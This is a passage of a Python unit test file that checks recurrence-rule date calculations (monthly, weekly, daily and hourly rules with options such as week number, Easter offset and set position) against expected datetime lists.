[datetime(1997, 9, 2, 18, 0, 6),
datetime(1997, 9, 2, 18, 0, 18),
datetime(1997, 10, 2, 6, 0, 6)])
def testMonthlyByMinuteAndSecond(self):
self.assertEqual(list(rrule(MONTHLY,
count=3,
byminute=(6, 18),
bysecond=(6, 18),
dtstart=datetime(1997, 9, 2, 9, 0))),
[datetime(1997, 9, 2, 9, 6, 6),
datetime(1997, 9, 2, 9, 6, 18),
datetime(1997, 9, 2, 9, 18, 6)])
def testMonthlyByHourAndMinuteAndSecond(self):
self.assertEqual(list(rrule(MONTHLY,
count=3,
byhour=(6, 18),
byminute=(6, 18),
bysecond=(6, 18),
dtstart=datetime(1997, 9, 2, 9, 0))),
[datetime(1997, 9, 2, 18, 6, 6),
datetime(1997, 9, 2, 18, 6, 18),
datetime(1997, 9, 2, 18, 18, 6)])
def testMonthlyBySetPos(self):
self.assertEqual(list(rrule(MONTHLY,
count=3,
bymonthday=(13, 17),
byhour=(6, 18),
bysetpos=(3, -3),
dtstart=datetime(1997, 9, 2, 9, 0))),
[datetime(1997, 9, 13, 18, 0),
datetime(1997, 9, 17, 6, 0),
datetime(1997, 10, 13, 18, 0)])
def testWeekly(self):
self.assertEqual(list(rrule(WEEKLY,
count=3,
dtstart=datetime(1997, 9, 2, 9, 0))),
[datetime(1997, 9, 2, 9, 0),
datetime(1997, 9, 9, 9, 0),
datetime(1997, 9, 16, 9, 0)])
def testWeeklyInterval(self):
self.assertEqual(list(rrule(WEEKLY,
count=3,
interval=2,
dtstart=datetime(1997, 9, 2, 9, 0))),
[datetime(1997, 9, 2, 9, 0),
datetime(1997, 9, 16, 9, 0),
datetime(1997, 9, 30, 9, 0)])
def testWeeklyIntervalLarge(self):
self.assertEqual(list(rrule(WEEKLY,
count=3,
interval=20,
dtstart=datetime(1997, 9, 2, 9, 0))),
[datetime(1997, 9, 2, 9, 0),
datetime(1998, 1, 20, 9, 0),
datetime(1998, 6, 9, 9, 0)])
def testWeeklyByMonth(self):
self.assertEqual(list(rrule(WEEKLY,
count=3,
bymonth=(1, 3),
dtstart=datetime(1997, 9, 2, 9, 0))),
[datetime(1998, 1, 6, 9, 0),
datetime(1998, 1, 13, 9, 0),
datetime(1998, 1, 20, 9, 0)])
def testWeeklyByMonthDay(self):
self.assertEqual(list(rrule(WEEKLY,
count=3,
bymonthday=(1, 3),
dtstart=datetime(1997, 9, 2, 9, 0))),
[datetime(1997, 9, 3, 9, 0),
datetime(1997, 10, 1, 9, 0),
datetime(1997, 10, 3, 9, 0)])
def testWeeklyByMonthAndMonthDay(self):
self.assertEqual(list(rrule(WEEKLY,
count=3,
bymonth=(1, 3),
bymonthday=(5, 7),
dtstart=datetime(1997, 9, 2, 9, 0))),
[datetime(1998, 1, 5, 9, 0),
datetime(1998, 1, 7, 9, 0),
datetime(1998, 3, 5, 9, 0)])
def testWeeklyByWeekDay(self):
self.assertEqual(list(rrule(WEEKLY,
count=3,
byweekday=(TU, TH),
dtstart=datetime(1997, 9, 2, 9, 0))),
[datetime(1997, 9, 2, 9, 0),
datetime(1997, 9, 4, 9, 0),
datetime(1997, 9, 9, 9, 0)])
def testWeeklyByNWeekDay(self):
self.assertEqual(list(rrule(WEEKLY,
count=3,
byweekday=(TU(1), TH(-1)),
dtstart=datetime(1997, 9, 2, 9, 0))),
[datetime(1997, 9, 2, 9, 0),
datetime(1997, 9, 4, 9, 0),
datetime(1997, 9, 9, 9, 0)])
def testWeeklyByMonthAndWeekDay(self):
# This test is interesting, because it crosses the year
# boundary in a weekly period to find day '1' as a
# valid recurrence.
self.assertEqual(list(rrule(WEEKLY,
count=3,
bymonth=(1, 3),
byweekday=(TU, TH),
dtstart=datetime(1997, 9, 2, 9, 0))),
[datetime(1998, 1, 1, 9, 0),
datetime(1998, 1, 6, 9, 0),
datetime(1998, 1, 8, 9, 0)])
def testWeeklyByMonthAndNWeekDay(self):
self.assertEqual(list(rrule(WEEKLY,
count=3,
bymonth=(1, 3),
byweekday=(TU(1), TH(-1)),
dtstart=datetime(1997, 9, 2, 9, 0))),
[datetime(1998, 1, 1, 9, 0),
datetime(1998, 1, 6, 9, 0),
datetime(1998, 1, 8, 9, 0)])
def testWeeklyByMonthDayAndWeekDay(self):
self.assertEqual(list(rrule(WEEKLY,
count=3,
bymonthday=(1, 3),
byweekday=(TU, TH),
dtstart=datetime(1997, 9, 2, 9, 0))),
[datetime(1998, 1, 1, 9, 0),
datetime(1998, 2, 3, 9, 0),
datetime(1998, 3, 3, 9, 0)])
def testWeeklyByMonthAndMonthDayAndWeekDay(self):
self.assertEqual(list(rrule(WEEKLY,
count=3,
bymonth=(1, 3),
bymonthday=(1, 3),
byweekday=(TU, TH),
dtstart=datetime(1997, 9, 2, 9, 0))),
[datetime(1998, 1, 1, 9, 0),
datetime(1998, 3, 3, 9, 0),
datetime(2001, 3, 1, 9, 0)])
def testWeeklyByYearDay(self):
self.assertEqual(list(rrule(WEEKLY,
count=4,
byyearday=(1, 100, 200, 365),
dtstart=datetime(1997, 9, 2, 9, 0))),
[datetime(1997, 12, 31, 9, 0),
datetime(1998, 1, 1, 9, 0),
datetime(1998, 4, 10, 9, 0),
datetime(1998, 7, 19, 9, 0)])
def testWeeklyByYearDayNeg(self):
self.assertEqual(list(rrule(WEEKLY,
count=4,
byyearday=(-365, -266, -166, -1),
dtstart=datetime(1997, 9, 2, 9, 0))),
[datetime(1997, 12, 31, 9, 0),
datetime(1998, 1, 1, 9, 0),
datetime(1998, 4, 10, 9, 0),
datetime(1998, 7, 19, 9, 0)])
def testWeeklyByMonthAndYearDay(self):
self.assertEqual(list(rrule(WEEKLY,
count=4,
bymonth=(1, 7),
byyearday=(1, 100, 200, 365),
dtstart=datetime(1997, 9, 2, 9, 0))),
[datetime(1998, 1, 1, 9, 0),
datetime(1998, 7, 19, 9, 0),
datetime(1999, 1, 1, 9, 0),
datetime(1999, 7, 19, 9, 0)])
def testWeeklyByMonthAndYearDayNeg(self):
self.assertEqual(list(rrule(WEEKLY,
count=4,
bymonth=(1, 7),
byyearday=(-365, -266, -166, -1),
dtstart=datetime(1997, 9, 2, 9, 0))),
[datetime(1998, 1, 1, 9, 0),
datetime(1998, 7, 19, 9, 0),
datetime(1999, 1, 1, 9, 0),
datetime(1999, 7, 19, 9, 0)])
def testWeeklyByWeekNo(self):
self.assertEqual(list(rrule(WEEKLY,
count=3,
byweekno=20,
dtstart=datetime(1997, 9, 2, 9, 0))),
[datetime(1998, 5, 11, 9, 0),
datetime(1998, 5, 12, 9, 0),
datetime(1998, 5, 13, 9, 0)])
def testWeeklyByWeekNoAndWeekDay(self):
# That's a nice one. The first days of week number one
# may be in the last year.
self.assertEqual(list(rrule(WEEKLY,
count=3,
byweekno=1,
byweekday=MO,
dtstart=datetime(1997, 9, 2, 9, 0))),
[datetime(1997, 12, 29, 9, 0),
datetime(1999, 1, 4, 9, 0),
datetime(2000, 1, 3, 9, 0)])
def testWeeklyByWeekNoAndWeekDayLarge(self):
# Another nice test. The last days of week number 52/53
# may be in the next year.
self.assertEqual(list(rrule(WEEKLY,
count=3,
byweekno=52,
byweekday=SU,
dtstart=datetime(1997, 9, 2, 9, 0))),
[datetime(1997, 12, 28, 9, 0),
datetime(1998, 12, 27, 9, 0),
datetime(2000, 1, 2, 9, 0)])
def testWeeklyByWeekNoAndWeekDayLast(self):
self.assertEqual(list(rrule(WEEKLY,
count=3,
byweekno=-1,
byweekday=SU,
dtstart=datetime(1997, 9, 2, 9, 0))),
[datetime(1997, 12, 28, 9, 0),
datetime(1999, 1, 3, 9, 0),
datetime(2000, 1, 2, 9, 0)])
def testWeeklyByWeekNoAndWeekDay53(self):
self.assertEqual(list(rrule(WEEKLY,
count=3,
byweekno=53,
byweekday=MO,
dtstart=datetime(1997, 9, 2, 9, 0))),
[datetime(1998, 12, 28, 9, 0),
datetime(2004, 12, 27, 9, 0),
datetime(2009, 12, 28, 9, 0)])
def testWeeklyByEaster(self):
self.assertEqual(list(rrule(WEEKLY,
count=3,
byeaster=0,
dtstart=datetime(1997, 9, 2, 9, 0))),
[datetime(1998, 4, 12, 9, 0),
datetime(1999, 4, 4, 9, 0),
datetime(2000, 4, 23, 9, 0)])
def testWeeklyByEasterPos(self):
self.assertEqual(list(rrule(WEEKLY,
count=3,
byeaster=1,
dtstart=datetime(1997, 9, 2, 9, 0))),
[datetime(1998, 4, 13, 9, 0),
datetime(1999, 4, 5, 9, 0),
datetime(2000, 4, 24, 9, 0)])
def testWeeklyByEasterNeg(self):
self.assertEqual(list(rrule(WEEKLY,
count=3,
byeaster=-1,
dtstart=datetime(1997, 9, 2, 9, 0))),
[datetime(1998, 4, 11, 9, 0),
datetime(1999, 4, 3, 9, 0),
datetime(2000, 4, 22, 9, 0)])
def testWeeklyByHour(self):
self.assertEqual(list(rrule(WEEKLY,
count=3,
byhour=(6, 18),
dtstart=datetime(1997, 9, 2, 9, 0))),
[datetime(1997, 9, 2, 18, 0),
datetime(1997, 9, 9, 6, 0),
datetime(1997, 9, 9, 18, 0)])
def testWeeklyByMinute(self):
self.assertEqual(list(rrule(WEEKLY,
count=3,
byminute=(6, 18),
dtstart=datetime(1997, 9, 2, 9, 0))),
[datetime(1997, 9, 2, 9, 6),
datetime(1997, 9, 2, 9, 18),
datetime(1997, 9, 9, 9, 6)])
def testWeeklyBySecond(self):
self.assertEqual(list(rrule(WEEKLY,
count=3,
bysecond=(6, 18),
dtstart=datetime(1997, 9, 2, 9, 0))),
[datetime(1997, 9, 2, 9, 0, 6),
datetime(1997, 9, 2, 9, 0, 18),
datetime(1997, 9, 9, 9, 0, 6)])
def testWeeklyByHourAndMinute(self):
self.assertEqual(list(rrule(WEEKLY,
count=3,
byhour=(6, 18),
byminute=(6, 18),
dtstart=datetime(1997, 9, 2, 9, 0))),
[datetime(1997, 9, 2, 18, 6),
datetime(1997, 9, 2, 18, 18),
datetime(1997, 9, 9, 6, 6)])
def testWeeklyByHourAndSecond(self):
self.assertEqual(list(rrule(WEEKLY,
count=3,
byhour=(6, 18),
bysecond=(6, 18),
dtstart=datetime(1997, 9, 2, 9, 0))),
[datetime(1997, 9, 2, 18, 0, 6),
datetime(1997, 9, 2, 18, 0, 18),
datetime(1997, 9, 9, 6, 0, 6)])
def testWeeklyByMinuteAndSecond(self):
self.assertEqual(list(rrule(WEEKLY,
count=3,
byminute=(6, 18),
bysecond=(6, 18),
dtstart=datetime(1997, 9, 2, 9, 0))),
[datetime(1997, 9, 2, 9, 6, 6),
datetime(1997, 9, 2, 9, 6, 18),
datetime(1997, 9, 2, 9, 18, 6)])
def testWeeklyByHourAndMinuteAndSecond(self):
self.assertEqual(list(rrule(WEEKLY,
count=3,
byhour=(6, 18),
byminute=(6, 18),
bysecond=(6, 18),
dtstart=datetime(1997, 9, 2, 9, 0))),
[datetime(1997, 9, 2, 18, 6, 6),
datetime(1997, 9, 2, 18, 6, 18),
datetime(1997, 9, 2, 18, 18, 6)])
def testWeeklyBySetPos(self):
self.assertEqual(list(rrule(WEEKLY,
count=3,
byweekday=(TU, TH),
byhour=(6, 18),
bysetpos=(3, -3),
dtstart=datetime(1997, 9, 2, 9, 0))),
[datetime(1997, 9, 2, 18, 0),
datetime(1997, 9, 4, 6, 0),
datetime(1997, 9, 9, 18, 0)])
def testDaily(self):
self.assertEqual(list(rrule(DAILY,
count=3,
dtstart=datetime(1997, 9, 2, 9, 0))),
[datetime(1997, 9, 2, 9, 0),
datetime(1997, 9, 3, 9, 0),
datetime(1997, 9, 4, 9, 0)])
def testDailyInterval(self):
self.assertEqual(list(rrule(DAILY,
count=3,
interval=2,
dtstart=datetime(1997, 9, 2, 9, 0))),
[datetime(1997, 9, 2, 9, 0),
datetime(1997, 9, 4, 9, 0),
datetime(1997, 9, 6, 9, 0)])
def testDailyIntervalLarge(self):
self.assertEqual(list(rrule(DAILY,
count=3,
interval=92,
dtstart=datetime(1997, 9, 2, 9, 0))),
[datetime(1997, 9, 2, 9, 0),
datetime(1997, 12, 3, 9, 0),
datetime(1998, 3, 5, 9, 0)])
def testDailyByMonth(self):
self.assertEqual(list(rrule(DAILY,
count=3,
bymonth=(1, 3),
dtstart=datetime(1997, 9, 2, 9, 0))),
[datetime(1998, 1, 1, 9, 0),
datetime(1998, 1, 2, 9, 0),
datetime(1998, 1, 3, 9, 0)])
def testDailyByMonthDay(self):
self.assertEqual(list(rrule(DAILY,
count=3,
bymonthday=(1, 3),
dtstart=datetime(1997, 9, 2, 9, 0))),
[datetime(1997, 9, 3, 9, 0),
datetime(1997, 10, 1, 9, 0),
datetime(1997, 10, 3, 9, 0)])
def testDailyByMonthAndMonthDay(self):
self.assertEqual(list(rrule(DAILY,
count=3,
bymonth=(1, 3),
bymonthday=(5, 7),
dtstart=datetime(1997, 9, 2, 9, 0))),
[datetime(1998, 1, 5, 9, 0),
datetime(1998, 1, 7, 9, 0),
datetime(1998, 3, 5, 9, 0)])
def testDailyByWeekDay(self):
self.assertEqual(list(rrule(DAILY,
count=3,
byweekday=(TU, TH),
dtstart=datetime(1997, 9, 2, 9, 0))),
[datetime(1997, 9, 2, 9, 0),
datetime(1997, 9, 4, 9, 0),
datetime(1997, 9, 9, 9, 0)])
def testDailyByNWeekDay(self):
self.assertEqual(list(rrule(DAILY,
count=3,
byweekday=(TU(1), TH(-1)),
dtstart=datetime(1997, 9, 2, 9, 0))),
[datetime(1997, 9, 2, 9, 0),
datetime(1997, 9, 4, 9, 0),
datetime(1997, 9, 9, 9, 0)])
def testDailyByMonthAndWeekDay(self):
self.assertEqual(list(rrule(DAILY,
count=3,
bymonth=(1, 3),
byweekday=(TU, TH),
dtstart=datetime(1997, 9, 2, 9, 0))),
[datetime(1998, 1, 1, 9, 0),
datetime(1998, 1, 6, 9, 0),
datetime(1998, 1, 8, 9, 0)])
def testDailyByMonthAndNWeekDay(self):
self.assertEqual(list(rrule(DAILY,
count=3,
bymonth=(1, 3),
byweekday=(TU(1), TH(-1)),
dtstart=datetime(1997, 9, 2, 9, 0))),
[datetime(1998, 1, 1, 9, 0),
datetime(1998, 1, 6, 9, 0),
datetime(1998, 1, 8, 9, 0)])
def testDailyByMonthDayAndWeekDay(self):
self.assertEqual(list(rrule(DAILY,
count=3,
bymonthday=(1, 3),
byweekday=(TU, TH),
dtstart=datetime(1997, 9, 2, 9, 0))),
[datetime(1998, 1, 1, 9, 0),
datetime(1998, 2, 3, 9, 0),
datetime(1998, 3, 3, 9, 0)])
def testDailyByMonthAndMonthDayAndWeekDay(self):
self.assertEqual(list(rrule(DAILY,
count=3,
bymonth=(1, 3),
bymonthday=(1, 3),
byweekday=(TU, TH),
dtstart=datetime(1997, 9, 2, 9, 0))),
[datetime(1998, 1, 1, 9, 0),
datetime(1998, 3, 3, 9, 0),
datetime(2001, 3, 1, 9, 0)])
def testDailyByYearDay(self):
self.assertEqual(list(rrule(DAILY,
count=4,
byyearday=(1, 100, 200, 365),
dtstart=datetime(1997, 9, 2, 9, 0))),
[datetime(1997, 12, 31, 9, 0),
datetime(1998, 1, 1, 9, 0),
datetime(1998, 4, 10, 9, 0),
datetime(1998, 7, 19, 9, 0)])
def testDailyByYearDayNeg(self):
self.assertEqual(list(rrule(DAILY,
count=4,
byyearday=(-365, -266, -166, -1),
dtstart=datetime(1997, 9, 2, 9, 0))),
[datetime(1997, 12, 31, 9, 0),
datetime(1998, 1, 1, 9, 0),
datetime(1998, 4, 10, 9, 0),
datetime(1998, 7, 19, 9, 0)])
def testDailyByMonthAndYearDay(self):
self.assertEqual(list(rrule(DAILY,
count=4,
bymonth=(1, 7),
byyearday=(1, 100, 200, 365),
dtstart=datetime(1997, 9, 2, 9, 0))),
[datetime(1998, 1, 1, 9, 0),
datetime(1998, 7, 19, 9, 0),
datetime(1999, 1, 1, 9, 0),
datetime(1999, 7, 19, 9, 0)])
def testDailyByMonthAndYearDayNeg(self):
self.assertEqual(list(rrule(DAILY,
count=4,
bymonth=(1, 7),
byyearday=(-365, -266, -166, -1),
dtstart=datetime(1997, 9, 2, 9, 0))),
[datetime(1998, 1, 1, 9, 0),
datetime(1998, 7, 19, 9, 0),
datetime(1999, 1, 1, 9, 0),
datetime(1999, 7, 19, 9, 0)])
def testDailyByWeekNo(self):
self.assertEqual(list(rrule(DAILY,
count=3,
byweekno=20,
dtstart=datetime(1997, 9, 2, 9, 0))),
[datetime(1998, 5, 11, 9, 0),
datetime(1998, 5, 12, 9, 0),
datetime(1998, 5, 13, 9, 0)])
def testDailyByWeekNoAndWeekDay(self):
# That's a nice one. The first days of week number one
# may be in the last year.
self.assertEqual(list(rrule(DAILY,
count=3,
byweekno=1,
byweekday=MO,
dtstart=datetime(1997, 9, 2, 9, 0))),
[datetime(1997, 12, 29, 9, 0),
datetime(1999, 1, 4, 9, 0),
datetime(2000, 1, 3, 9, 0)])
def testDailyByWeekNoAndWeekDayLarge(self):
# Another nice test. The last days of week number 52/53
# may be in the next year.
self.assertEqual(list(rrule(DAILY,
count=3,
byweekno=52,
byweekday=SU,
dtstart=datetime(1997, 9, 2, 9, 0))),
[datetime(1997, 12, 28, 9, 0),
datetime(1998, 12, 27, 9, 0),
datetime(2000, 1, 2, 9, 0)])
def testDailyByWeekNoAndWeekDayLast(self):
self.assertEqual(list(rrule(DAILY,
count=3,
byweekno=-1,
byweekday=SU,
dtstart=datetime(1997, 9, 2, 9, 0))),
[datetime(1997, 12, 28, 9, 0),
datetime(1999, 1, 3, 9, 0),
datetime(2000, 1, 2, 9, 0)])
def testDailyByWeekNoAndWeekDay53(self):
self.assertEqual(list(rrule(DAILY,
count=3,
byweekno=53,
byweekday=MO,
dtstart=datetime(1997, 9, 2, 9, 0))),
[datetime(1998, 12, 28, 9, 0),
datetime(2004, 12, 27, 9, 0),
datetime(2009, 12, 28, 9, 0)])
def testDailyByEaster(self):
self.assertEqual(list(rrule(DAILY,
count=3,
byeaster=0,
dtstart=datetime(1997, 9, 2, 9, 0))),
[datetime(1998, 4, 12, 9, 0),
datetime(1999, 4, 4, 9, 0),
datetime(2000, 4, 23, 9, 0)])
def testDailyByEasterPos(self):
self.assertEqual(list(rrule(DAILY,
count=3,
byeaster=1,
dtstart=datetime(1997, 9, 2, 9, 0))),
[datetime(1998, 4, 13, 9, 0),
datetime(1999, 4, 5, 9, 0),
datetime(2000, 4, 24, 9, 0)])
def testDailyByEasterNeg(self):
self.assertEqual(list(rrule(DAILY,
count=3,
byeaster=-1,
dtstart=datetime(1997, 9, 2, 9, 0))),
[datetime(1998, 4, 11, 9, 0),
datetime(1999, 4, 3, 9, 0),
datetime(2000, 4, 22, 9, 0)])
def testDailyByHour(self):
self.assertEqual(list(rrule(DAILY,
count=3,
byhour=(6, 18),
dtstart=datetime(1997, 9, 2, 9, 0))),
[datetime(1997, 9, 2, 18, 0),
datetime(1997, 9, 3, 6, 0),
datetime(1997, 9, 3, 18, 0)])
def testDailyByMinute(self):
self.assertEqual(list(rrule(DAILY,
count=3,
byminute=(6, 18),
dtstart=datetime(1997, 9, 2, 9, 0))),
[datetime(1997, 9, 2, 9, 6),
datetime(1997, 9, 2, 9, 18),
datetime(1997, 9, 3, 9, 6)])
def testDailyBySecond(self):
self.assertEqual(list(rrule(DAILY,
count=3,
bysecond=(6, 18),
dtstart=datetime(1997, 9, 2, 9, 0))),
[datetime(1997, 9, 2, 9, 0, 6),
datetime(1997, 9, 2, 9, 0, 18),
datetime(1997, 9, 3, 9, 0, 6)])
def testDailyByHourAndMinute(self):
self.assertEqual(list(rrule(DAILY,
count=3,
byhour=(6, 18),
byminute=(6, 18),
dtstart=datetime(1997, 9, 2, 9, 0))),
[datetime(1997, 9, 2, 18, 6),
datetime(1997, 9, 2, 18, 18),
datetime(1997, 9, 3, 6, 6)])
def testDailyByHourAndSecond(self):
self.assertEqual(list(rrule(DAILY,
count=3,
byhour=(6, 18),
bysecond=(6, 18),
dtstart=datetime(1997, 9, 2, 9, 0))),
[datetime(1997, 9, 2, 18, 0, 6),
datetime(1997, 9, 2, 18, 0, 18),
datetime(1997, 9, 3, 6, 0, 6)])
def testDailyByMinuteAndSecond(self):
self.assertEqual(list(rrule(DAILY,
count=3,
byminute=(6, 18),
bysecond=(6, 18),
dtstart=datetime(1997, 9, 2, 9, 0))),
[datetime(1997, 9, 2, 9, 6, 6),
datetime(1997, 9, 2, 9, 6, 18),
datetime(1997, 9, 2, 9, 18, 6)])
def testDailyByHourAndMinuteAndSecond(self):
self.assertEqual(list(rrule(DAILY,
count=3,
byhour=(6, 18),
byminute=(6, 18),
bysecond=(6, 18),
dtstart=datetime(1997, 9, 2, 9, 0))),
[datetime(1997, 9, 2, 18, 6, 6),
datetime(1997, 9, 2, 18, 6, 18),
datetime(1997, 9, 2, 18, 18, 6)])
def testDailyBySetPos(self):
self.assertEqual(list(rrule(DAILY,
count=3,
byhour=(6, 18),
byminute=(15, 45),
bysetpos=(3, -3),
dtstart=datetime(1997, 9, 2, 9, 0))),
[datetime(1997, 9, 2, 18, 15),
datetime(1997, 9, 3, 6, 45),
datetime(1997, 9, 3, 18, 15)])
def testHourly(self):
self.assertEqual(list(rrule(HOURLY,
count=3,
dtstart=datetime(1997, 9, 2, 9, 0))),
[datetime(1997, 9, 2, 9, 0),
datetime(1997, 9, 2, 10, 0),
datetime(1997, 9, 2, 11, 0)])
def testHourlyInterval(self):
self.assertEqual(list(rrule(HOURLY,
count=3,
interval=2,
dtstart=datetime(1997, 9, 2, 9, 0))),
[datetime(1997, 9, 2, 9, 0),
datetime(1997, 9, 2, 11, 0),
datetime(1997, 9, 2, 13, 0)])
def testHourlyIntervalLarge(self):
self.assertEqual(list(rrule(HOURLY,
count=3,
interval=769,
dtstart=datetime(1997, 9, 2, 9, 0))),
[datetime(1997, 9, 2, 9, 0),
datetime(1997, 10, 4, 10, 0),
datetime(1997, 11, 5, 11, 0)])
def testHourlyByMonth(self):
self.assertEqual(list(rrule(HOURLY,
count=3,
bymonth=(1, 3),
dtstart=datetime(1997, 9, 2, 9, 0))),
[datetime(1998, 1, 1, 0, 0),
datetime(1998, 1, 1, 1, 0),
datetime(1998, 1, 1, 2, 0)])
def testHourlyByMonthDay(self):
self.assertEqual(list(rrule(HOURLY,
count=3,
bymonthday=(1, 3),
dtstart=datetime(1997, 9, 2, 9, 0))),
[datetime(1997, 9, 3, 0, 0),
datetime(1997, 9, 3, 1, 0),
datetime(1997, 9, 3, 2, 0)])
def testHourlyByMonthAndMonthDay(self):
self.assertEqual(list(rrule(HOURLY,
count=3,
bymonth=(1, 3),
bymonthday=(5, 7),
dtstart=datetime(1997, 9, 2, 9, 0))),
[datetime(1998, 1, 5, 0, 0),
datetime(1998, 1, 5, 1, 0),
datetime(1998, 1, 5, 2, 0)])
def testHourlyByWeekDay(self):
self.assertEqual(list(rrule(HOURLY,
count=3,
byweekday=(TU, TH),
dtstart=datetime(1997, 9, 2, 9, 0))),
[datetime(1997, 9, 2, 9, 0),
datetime(1997, 9, 2, 10, 0),
datetime(1997, 9, 2, 11, 0)])
def testHourlyByNWeekDay(self):
self.assertEqual(list(rrule(HOURLY,
count=3,
byweekday=(TU(1), TH(-1)),
dtstart=datetime(1997, 9, 2, 9, 0))),
[datetime(1997, 9, 2, 9, 0),
datetime(1997, 9, 2, 10, 0),
datetime(1997, 9, 2, 11, 0)])
def testHourlyByMonthAndWeekDay(self):
self.assertEqual(list(rrule(HOURLY,
count=3,
bymonth=(1, 3),
byweekday=(TU, TH),
dtstart=datetime(1997, 9, 2, 9, 0))),
[datetime(1998, 1, 1, 0, 0),
datetime(1998, 1, 1, 1, 0),
datetime(1998, 1, 1, 2, 0)])
def testHourlyByMonthAndNWeekDay(self):
self.assertEqual(list(rrule(HOURLY,
count=3,
bymonth=(1, 3),
byweekday=(TU(1), TH(-1)),
dtstart=datetime(1997, 9, 2, 9, 0))),
[datetime(1998, 1, 1, 0, 0),
datetime(1998, 1, 1, 1, 0),
datetime(1998, 1, 1, 2, 0)])
def testHourlyByMonthDayAndWeekDay(self):
self.assertEqual(list(rrule(HOURLY,
count=3,
bymonthday=(1, 3),
byweekday=(TU, TH),
dtstart=datetime(1997, 9, 2, 9, 0))),
[datetime(1998, 1, 1, 0, 0),
datetime(1998, 1, 1, 1, 0),
datetime(1998, 1, 1, 2, 0)])
def testHourlyByMonthAndMonthDayAndWeekDay(self):
self.assertEqual(list(rrule(HOURLY,
count=3,
bymonth=(1, 3),
bymonthday=(1, 3),
byweekday=(TU, TH),
dtstart=datetime(1997, 9, 2, 9, 0))),
[datetime(1998, 1, 1, 0, 0),
datetime(1998, 1, 1, 1, 0),
datetime(1998, 1, 1, 2, 0)])
def testHourlyByYearDay(self):
self.assertEqual(list(rrule(HOURLY,
count=4,
byyearday=(1, 100, 200, 365),
dtstart=datetime(1997, 9, 2, 9, 0))),
[datetime(1997, 12, 31, 0, 0),
datetime(1997, 12, 31, 1, 0),
datetime(1997, 12, 31, 2, 0),
datetime(1997, 12, 31, 3, 0)])
def testHourlyByYearDayNeg(self):
self.assertEqual(list(rrule(HOURLY,
count=4,
byyearday=(-365, -266, -166, -1),
dtstart=datetime(1997, 9, 2, 9, 0))),
[datetime(1997, 12, 31, 0, 0),
datetime(1997, 12, 31, 1, 0),
datetime(1997, 12, 31, 2, 0),
datetime(1997, 12, 31, 3, 0)])
def testHourlyByMonthAndYearDay(self):
self.assertEqual(list(rrule(HOURLY,
count=4,
bymonth=(4, 7),
byyearday=(1, 100, 200, 365),
dtstart=datetime(1997, 9, 2, 9, 0))),
[datetime(1998, 4, 10, 0, 0),
datetime(1998, 4, 10, 1, 0),
datetime(1998, 4, 10, 2, 0),
datetime(1998, 4, 10, 3, 0)])
def testHourlyByMonthAndYearDayNeg(self):
self.assertEqual(list(rrule(HOURLY,
count=4,
bymonth=(4, 7),
byyearday=(-365, -266, -166, -1),
dtstart=datetime(1997, 9, 2, 9, 0))),
[datetime(1998, 4, 10, 0, 0),
datetime(1998, 4, 10, 1, 0),
datetime(1998, 4, 10, 2, 0),
datetime(1998, 4, 10, 3, 0)])
def testHourlyByWeekNo(self):
self.assertEqual(list(rrule(HOURLY,
count=3,
byweekno=20,
dtstart=datetime(1997, 9, 2, 9, 0))),
[datetime(1998, 5, 11, 0, 0),
datetime(1998, 5, 11, 1, 0),
datetime(1998, 5, 11, 2, 0)])
def testHourlyByWeekNoAndWeekDay(self):
self.assertEqual(list(rrule(HOURLY,
count=3,
byweekno=1,
byweekday=MO,
dtstart=datetime(1997, 9, 2, 9, 0))),
[datetime(1997, 12, 29, 0, 0),
datetime(1997, 12, 29, 1, 0),
datetime(1997, 12, 29, 2, 0)])
def testHourlyByWeekNoAndWeekDayLarge(self):
self.assertEqual(list(rrule(HOURLY,
count=3,
byweekno=52,
byweekday=SU,
dtstart=datetime(1997, 9, 2, 9, 0))),
[datetime(1997, 12, 28, 0, 0),
datetime(1997, 12, 28, 1, 0),
datetime(1997, 12, 28, 2, 0)])
def testHourlyByWeekNoAndWeekDayLast(self):
self.assertEqual(list(rrule(HOURLY,
count=3,
byweekno=-1,
byweekday=SU,
dtstart=datetime(1997, 9, 2, 9, 0))),
[datetime(1997, 12, 28, 0, 0),
datetime(1997, 12, 28, 1, 0),
datetime(1997, 12, 28, 2, 0)])
def testHourlyByWeekNoAndWeekDay53(self):
self.assertEqual(list(rrule(HOURLY,
count=3,
byweekno=53,
byweekday=MO,
dtstart=datetime(1997, 9, 2, 9, 0))),
[datetime(1998, 12, 28, 0, 0),
datetime(1998, 12, 28, 1, 0),
datetime(1998, 12, 28, 2, 0)])
def testHourlyByEaster(self):
self.assertEqual(list(rrule(HOURLY,
count=3,
byeaster=0,
dtstart=datetime(1997, 9, 2, 9, 0))),
[datetime(1998, 4, 12, 0, 0),
datetime(1998, 4, 12, 1, 0),
datetime(1998, 4, 12, 2, 0)])
def testHourlyByEasterPos(self):
self.assertEqual(list(rrule(HOURLY,
count=3,
byeaster=1,
dtstart=datetime(1997, 9, 2, 9, 0))),
[datetime(1998, 4, 13, 0, 0),
datetime(1998, 4, 13, 1, 0),
datetime(1998, 4, 13, 2, 0)])
def testHourlyByEasterNeg(self):
self.assertEqual(list(rrule(HOURLY,
count=3,
byeaster=-1,
dtstart=datetime(1997, 9, 2, 9, 0))),
[datetime(1998, 4, 11, 0, 0),
datetime(1998, 4, 11, 1, 0),
datetime(1998, 4, 11, 2, 0)])
def testHourlyByHour(self):
self.assertEqual(list(rrule(HOURLY,
count=3,
byhour=(6, 18),
dtstart=datetime(1997, 9, 2, 9, 0))),
[datetime(1997, 9, 2, 18, 0),
datetime(1997, 9, 3, 6, 0),
datetime(1997, 9, 3, 18, 0)])
def testHourlyByMinute(self):
self.assertEqual(list(rrule(HOURLY,
count=3,
byminute=(6, 18),
dtstart=datetime(1997, 9, 2, 9, 0))),
[datetime(1997, 9, 2, 9, 6),
datetime(1997, 9, 2, 9, 18),
datetime(1997, 9, 2, 10, 6)])
def testHourlyBySecond(self):
self.assertEqual(list(rrule(HOURLY,
count=3,
bysecond=(6, 18),
dtstart=datetime(1997, 9, 2, 9, 0))),
[datetime(1997, 9, 2, 9, 0, 6),
datetime(1997, 9, 2, 9, 0, 18),
datetime(1997, 9, 2, 10, 0, 6)])
def testHourlyByHourAndMinute(self):
self.assertEqual(list(rrule(HOURLY,
count=3,
byhour=(6, 18),
byminute=(6, 18),
dtstart=datetime(1997, 9, 2, 9, 0))),
[datetime(1997, 9, 2, 18, 6),
datetime(1997, 9, 2, 18, 18),
datetime(1997, 9, 3, 6, 6)])
def testHourlyByHourAndSecond(self):
self.assertEqual(list(rrule(HOURLY,
count=3,
byhour=(6, 18),
bysecond=(6, 18),
dtstart=datetime(1997, 9, 2, 9, 0))),
[datetime(1997, 9, 2, 18, 0, 6),
